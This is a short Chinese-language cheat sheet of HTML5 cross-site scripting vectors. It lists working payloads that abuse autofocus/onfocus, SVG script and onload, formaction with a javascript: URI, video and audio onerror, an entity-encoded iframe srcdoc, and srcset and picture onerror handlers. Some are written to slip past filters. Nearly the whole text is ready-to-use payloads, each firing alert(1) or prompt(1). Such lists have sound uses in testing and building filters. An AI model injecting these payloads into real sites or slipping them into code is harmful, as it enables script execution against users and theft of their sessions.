autofocus 属性

h5中为input, textarea, button, select, keygen 标签 加入了autofocus属性，所有就有如下的攻击向量

<input autofocus onfocus="alert(1)">

SVG标签

<svg><script> alert&#40+&#41</script></svg>     <!--  可以引入html实体，会自解码 -->

<svg/onload=prompt(1)   <!-- // 无需结束标签 -->

formaction 属性

用来覆盖form的action, 所以和submit配合用

<form>
<button formaction="javascript:alert(1)" type="sbumit">
click me
</button>
</form>

video&audio 标签

<video><source onerror="alert(1)"></video>
<video src=x onerror="alert(1)" />
<video onerror="alert(1)"><source></source></source>

srcdoc 属性

不和当前页面共享域，这个域在about:srcdoc

<iframe srcdoc="&lt;img&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">

srcset 属性

可以代替src属性触发onerror事件

<img srcset=",x" onerror="alert(1)">

picture 标签

<picture>
    <source srcset="x">
    <img onerror="alert(1)">
</picture>